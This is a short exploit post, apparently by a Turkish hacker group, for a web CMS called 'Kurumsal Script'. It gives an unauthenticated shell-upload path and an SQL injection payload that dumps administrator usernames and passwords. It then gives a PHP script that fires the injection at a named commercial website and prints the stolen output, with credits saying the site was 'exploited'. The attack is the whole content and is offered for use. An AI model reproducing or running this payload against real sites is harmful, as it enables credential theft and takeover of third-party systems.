Kurumsal Script Multiple Vulnerability

buda beyaz.org dan baypars kardeşimize aittir
Dork: Must google image search
http://www.bozdemirbilgisayar.com/images/logo.png


1-) Shell Upload Vuln

===============================
http://site.com/upload/upload.php



2-) Sql İnj Vuln

===============================
http://site.com/urunkat.php?url=bil...assword),3,4,5,6,7,8,9+from+administrator--+-



## All Exploited by Baypars ##

Special Thanks
===============================
ynR ! - Melallanguid - T3kfurD4GLı - Ferid23 - Artist - Cromber
and b3yaz.ORG and Anti-Armenia.ORG all users
===============================
Shell Upload Vulnerability founded by ynR !


<?php
$fp = fsockopen("www.bozdemirbilgisayar.com", 80, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
} else {
$out = "GET /urunkat.php?url=bilgisayar'+and+false+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+administrator--+- HTTP/1.1\r\n";
$out .= "Host: www.bozdemirbilgisayar.com\r\n";
$out .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0<Coded by Baypars>\r\n";
$out .= "Referer: www.bozdemirbilgisayar.com\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);
}
?>